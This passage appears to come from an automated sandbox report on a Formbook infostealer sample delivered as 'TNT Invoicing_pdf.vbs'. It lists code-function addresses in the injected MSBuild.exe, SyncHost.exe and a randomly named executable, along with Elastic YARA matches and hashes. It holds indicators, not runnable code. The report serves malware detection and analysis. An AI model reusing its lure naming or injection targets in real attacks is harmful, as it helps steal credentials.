Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652AB0 NtWaitForSingleObject,	13_2_04652AB0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652B80 NtQueryInformationFile,	13_2_04652B80

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00401000	10_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0040FB5A	10_2_0040FB5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0040FB63	10_2_0040FB63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0042D333	10_2_0042D333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_004033C5	10_2_004033C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_004033D0	10_2_004033D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0040247E	10_2_0040247E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00416430	10_2_00416430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00416433	10_2_00416433
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00402480	10_2_00402480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00402C8D	10_2_00402C8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00402C90	10_2_00402C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0040FD83	10_2_0040FD83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00402644	10_2_00402644
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00402650	10_2_00402650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00402669	10_2_00402669
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0040DE03	10_2_0040DE03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00402F40	10_2_00402F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00402F3D	10_2_00402F3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109A118	10_2_0109A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01088158	10_2_01088158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010CB16B	10_2_010CB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103516C	10_2_0103516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C01AA	10_2_010C01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100B1B0	10_2_0100B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B81CC	10_2_010B81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AF0CC	10_2_010AF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B70E9	10_2_010B70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BF0E0	10_2_010BF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF0100	10_2_00FF0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B132D	10_2_010B132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BA352	10_2_010BA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0104739A	10_2_0104739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C03E6	10_2_010C03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100E3F0	10_2_0100E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010052A0	10_2_010052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FED34C	10_2_00FED34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101B2C0	10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010802C0	10_2_010802C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A12ED	10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01000535	10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B7571	10_2_010B7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C0591	10_2_010C0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF1460	10_2_00FF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109D5B0	10_2_0109D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BF43F	10_2_010BF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B2446	10_2_010B2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AE4F6	10_2_010AE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01024750	10_2_01024750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01000770	10_2_01000770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BF7B0	10_2_010BF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFC7C0	10_2_00FFC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B16CC	10_2_010B16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101C6E0	10_2_0101C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE68B8	10_2_00FE68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01009950	10_2_01009950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101B950	10_2_0101B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01016962	10_2_01016962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010029A0	10_2_010029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010CA9A6	10_2_010CA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0106D800	10_2_0106D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01002840	10_2_01002840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100A840	10_2_0100A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010038E0	10_2_010038E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E8F0	10_2_0102E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BAB40	10_2_010BAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BFB76	10_2_010BFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFEA80	10_2_00FFEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101FB80	10_2_0101FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B6BD7	10_2_010B6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01075BF0	10_2_01075BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103DBF9	10_2_0103DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BFA49	10_2_010BFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B7A46	10_2_010B7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01073A6C	10_2_01073A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01045AA0	10_2_01045AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109DAAC	10_2_0109DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010ADAC6	10_2_010ADAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100AD00	10_2_0100AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF0CF2	10_2_00FF0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01003D40	10_2_01003D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B1D5A	10_2_010B1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B7D73	10_2_010B7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01018DBF	10_2_01018DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101FDC0	10_2_0101FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01000C00	10_2_01000C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFADE0	10_2_00FFADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01079C32	10_2_01079C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0CB5	10_2_010A0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BFCF2	10_2_010BFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BFF09	10_2_010BFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01042F28	10_2_01042F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01020F30	10_2_01020F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01074F40	10_2_01074F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001F92	10_2_01001F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107EFA0	10_2_0107EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BFFB1	10_2_010BFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100CFE0	10_2_0100CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BEE26	10_2_010BEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF2FC8	10_2_00FF2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01000E59	10_2_01000E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01012E90	10_2_01012E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BCE93	10_2_010BCE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01009EB0	10_2_01009EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BEEDB	10_2_010BEEDB
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034D87BA	12_2_034D87BA
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034DA790	12_2_034DA790
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034E0E40	12_2_034E0E40
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034E0E3D	12_2_034E0E3D
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034F7D40	12_2_034F7D40
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034DA567	12_2_034DA567
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034DA570	12_2_034DA570
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04611460	13_2_04611460
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046D2446	13_2_046D2446
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DF43F	13_2_046DF43F
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046CE4F6	13_2_046CE4F6
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046D7571	13_2_046D7571
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04620535	13_2_04620535
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046BD5B0	13_2_046BD5B0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046E0591	13_2_046E0591
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0463C6E0	13_2_0463C6E0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046D16CC	13_2_046D16CC
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04620770	13_2_04620770
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04644750	13_2_04644750
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0461C7C0	13_2_0461C7C0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DF7B0	13_2_046DF7B0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046D70E9	13_2_046D70E9
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DF0E0	13_2_046DF0E0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046CF0CC	13_2_046CF0CC
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046270C0	13_2_046270C0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046EB16B	13_2_046EB16B
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0465516C	13_2_0465516C
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0460F172	13_2_0460F172
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04610100	13_2_04610100
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046BA118	13_2_046BA118
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046D81CC	13_2_046D81CC
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046E01AA	13_2_046E01AA
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0462B1B0	13_2_0462B1B0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046C0274	13_2_046C0274
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046C12ED	13_2_046C12ED
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0463B2C0	13_2_0463B2C0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046252A0	13_2_046252A0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0460D34C	13_2_0460D34C
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DA352	13_2_046DA352
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046D132D	13_2_046D132D
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046E03E6	13_2_046E03E6
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0462E3F0	13_2_0462E3F0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0466739A	13_2_0466739A
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04699C32	13_2_04699C32
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04620C00	13_2_04620C00
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04610CF2	13_2_04610CF2
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DFCF2	13_2_046DFCF2
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046C0CB5	13_2_046C0CB5
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046D7D73	13_2_046D7D73
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04623D40	13_2_04623D40
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046D1D5A	13_2_046D1D5A
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0462AD00	13_2_0462AD00
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0461ADE0	13_2_0461ADE0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0463FDC0	13_2_0463FDC0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04638DBF	13_2_04638DBF
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04620E59	13_2_04620E59
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DEE26	13_2_046DEE26
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DEEDB	13_2_046DEEDB
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04629EB0	13_2_04629EB0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04632E90	13_2_04632E90
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DCE93	13_2_046DCE93
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04694F40	13_2_04694F40
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04662F28	13_2_04662F28
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04640F30	13_2_04640F30
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DFF09	13_2_046DFF09
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0462CFE0	13_2_0462CFE0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04612FC8	13_2_04612FC8
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DFFB1	13_2_046DFFB1
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04621F92	13_2_04621F92
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04622840	13_2_04622840
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0462A840	13_2_0462A840
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0468D800	13_2_0468D800
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046238E0	13_2_046238E0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0464E8F0	13_2_0464E8F0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046068B8	13_2_046068B8
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04636962	13_2_04636962
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04629950	13_2_04629950
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0463B950	13_2_0463B950
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046229A0	13_2_046229A0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046EA9A6	13_2_046EA9A6
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04693A6C	13_2_04693A6C
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DFA49	13_2_046DFA49
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046D7A46	13_2_046D7A46
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046CDAC6	13_2_046CDAC6
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04665AA0	13_2_04665AA0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046BDAAC	13_2_046BDAAC
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0461EA80	13_2_0461EA80
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DFB76	13_2_046DFB76
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046DAB40	13_2_046DAB40
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0465DBF9	13_2_0465DBF9
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046D6BD7	13_2_046D6BD7
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_0463FB80	13_2_0463FB80
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 17_2_0566F471	17_2_0566F471
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 17_2_05675F81	17_2_05675F81
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 17_2_056711C8	17_2_056711C8
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 17_2_056711D1	17_2_056711D1
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 17_2_0568E9A1	17_2_0568E9A1
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 17_2_056713F1	17_2_056713F1
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 17_2_05677AA1	17_2_05677AA1
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 17_2_05677A9E	17_2_05677A9E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 01035130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00FEB970 appears 272 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0106EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0107F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 01047E54 appears 97 times
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: String function: 04655130 appears 36 times
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: String function: 0468EA12 appears 86 times
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: String function: 04667E54 appears 89 times
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: String function: 0460B970 appears 268 times
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: String function: 0469F290 appears 105 times

Source: TNT Invoicing_pdf.vbs

Initial sample: Strings found which are bigger than 50

Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
